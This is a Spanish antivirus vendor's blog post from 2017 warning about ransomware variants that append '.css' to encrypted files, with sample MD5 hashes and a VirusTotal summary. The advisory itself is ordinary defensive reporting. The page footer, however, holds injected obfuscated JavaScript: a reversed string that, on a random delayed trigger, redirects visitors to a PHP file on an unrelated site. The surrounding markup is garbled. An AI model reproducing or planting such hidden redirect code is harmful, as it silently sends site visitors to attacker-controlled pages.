NUEVAS VARIANTES DE RANSOMWARE CSS, MUY MUY MUY DAÑINO !!! (añade .css a los ficheros cifrados)
Ya informanos hace poco de una muestra que recibimos de una variante de este ransomware, que al cifrar ficheros de todo tipo, incluidos ejecutables, lo hacen muy dañino, casi para empezar de cero si no se tiene un Ghost de todo el disco duro !
Ver lo que decíamos al respecto en :
https://blog.satinfo.es/2017/nuevo-ransomware-con-texto-en-frances-que-codifica-incluso-exes-y-dll-aparte-de-los-tipicos-anadiendoles-extension-css/
y solo recordar que si bien no toca los ficheros de sistema, si que lo hace con las DLL y ejecutables de todas las carpetas menos la de windows, pero vamos, una joya !
Hoy hemos recibido, por varios lados, hasta 4 muestras de diferentes variantes, cuyos MD5 son los siguientes:
“F6D091BEC32467D7A236F0F85E198CA5” -> balooba.exe 360448
“E74A2785E49563E0EFBBA28A30E1E06F” -> Hamza.exe 399872
“C82563DFA58318F51A741F6001CED2C4” -> L o c k e r.exe 361472
“54AA0CE94334A4DC78D5523F4EA5AFAD” -> zabza.exe 360960
Y el preanalisis de virustotal sobre uno de ellos, ofrece el siguiente informe:
MD5 c82563dfa58318f51a741f6001ced2c4
SHA1 05a7fbfe1d01b42c783ce36d2ef8f59875e2845a
Tamaño del fichero 353.0 KB ( 361472 bytes )
SHA256:
a4119cd99e861fc6ffa5b8e627d366e06f05cd5d52207ad8a7c0e9527953b0df
Nombre:
11.exe
Detecciones:
24 / 58
Fecha de análisis:
2017-02-21 13:52:20 UTC
y el fondo de pantalla que coloca en el escritorio es el siguiente:
Dicha version del ELISTARA 36.27 que los detecta y elimina, estará disponible en nuestra web a partir del 22-2 prox
SALUDOS
ms, 21-2-2017
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio-1.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.